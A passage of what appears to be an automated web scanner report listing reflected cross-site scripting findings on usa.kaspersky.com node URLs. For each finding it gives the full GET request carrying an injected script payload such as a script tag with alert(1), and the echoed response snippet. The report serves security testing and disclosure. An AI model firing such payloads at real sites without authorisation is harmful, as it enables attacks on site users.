Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:42:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686933"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:42:18 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5746e5d41"-alert(1)-"0fb1bb0037a";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.141. http://usa.kaspersky.com/node/5747 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5747

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c43ba"-alert(1)-"ab096d51e58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodec43ba"-alert(1)-"ab096d51e58/5747 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:42:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686925"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:42:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodec43ba"-alert(1)-"ab096d51e58/5747";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.142. http://usa.kaspersky.com/node/5747 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5747

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc507"><script>alert(1)</script>a59b8f463f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodedc507"><script>alert(1)</script>a59b8f463f5/5747 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:41:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686897"
Content-Type: text/html; charset=utf-8
Content-Length: 30102
Date: Sat, 18 Dec 2010 15:41:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodedc507"><script>alert(1)</script>a59b8f463f5/5747" />
...[SNIP]...

1.143. http://usa.kaspersky.com/node/5747 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5747

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2865e"-alert(1)-"3b6ca8547ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/57472865e"-alert(1)-"3b6ca8547ae HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:43:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687009"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:43:35 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/57472865e"-alert(1)-"3b6ca8547ae";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.144. http://usa.kaspersky.com/node/5747 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5747

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d98"><script>alert(1)</script>c7b8c82fc12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/574738d98"><script>alert(1)</script>c7b8c82fc12 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:43:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686993"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:43:20 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/574738d98"><script>alert(1)</script>c7b8c82fc12" />
...[SNIP]...

1.145. http://usa.kaspersky.com/node/5748 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5748

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77c39"><script>alert(1)</script>f7c9665376c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node77c39"><script>alert(1)</script>f7c9665376c/5748 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:44:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687078"
Content-Type: text/html; charset=utf-8
Content-Length: 30102
Date: Sat, 18 Dec 2010 15:44:45 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node77c39"><script>alert(1)</script>f7c9665376c/5748" />
...[SNIP]...

1.146. http://usa.kaspersky.com/node/5748 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5748

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61e9a"-alert(1)-"2d9d15cd311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node61e9a"-alert(1)-"2d9d15cd311/5748 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:44:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687099"
Content-Type: text/html; charset=utf-8
Content-Length: 30005
Date: Sat, 18 Dec 2010 15:45:12 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node61e9a"-alert(1)-"2d9d15cd311/5748";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.147. http://usa.kaspersky.com/node/5748 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5748

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a5b"><script>alert(1)</script>758def8eb05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5748f7a5b"><script>alert(1)</script>758def8eb05 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687190"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:46:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5748f7a5b"><script>alert(1)</script>758def8eb05" />
...[SNIP]...

1.148. http://usa.kaspersky.com/node/5748 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5748

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ea89"-alert(1)-"adae0b49559 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/57485ea89"-alert(1)-"adae0b49559 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687211"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:46:58 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/57485ea89"-alert(1)-"adae0b49559";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.149. http://usa.kaspersky.com/node/5749 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5749

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6c3"-alert(1)-"2e02b36b762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node3f6c3"-alert(1)-"2e02b36b762/5749 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687125"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:45:33 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node3f6c3"-alert(1)-"2e02b36b762/5749";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.150. http://usa.kaspersky.com/node/5749 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5749

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8ed"><script>alert(1)</script>650240905de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodebd8ed"><script>alert(1)</script>650240905de/5749 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687109"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:45:15 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodebd8ed"><script>alert(1)</script>650240905de/5749" />
...[SNIP]...

1.151. http://usa.kaspersky.com/node/5749 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5749

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66073"><script>alert(1)</script>fda90b3dfc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/574966073"><script>alert(1)</script>fda90b3dfc9 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687212"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:46:59 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/574966073"><script>alert(1)</script>fda90b3dfc9" />
...[SNIP]...

1.152. http://usa.kaspersky.com/node/5749 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5749

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e36b7"-alert(1)-"385fda2fdf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5749e36b7"-alert(1)-"385fda2fdf3 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:47:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687242"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:47:29 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5749e36b7"-alert(1)-"385fda2fdf3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.153. http://usa.kaspersky.com/node/5750 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5750

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c38c2"><script>alert(1)</script>1f8e4638aba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodec38c2"><script>alert(1)</script>1f8e4638aba/5750 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687123"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:45:29 GMT
Connection: close
X-VC: MISS

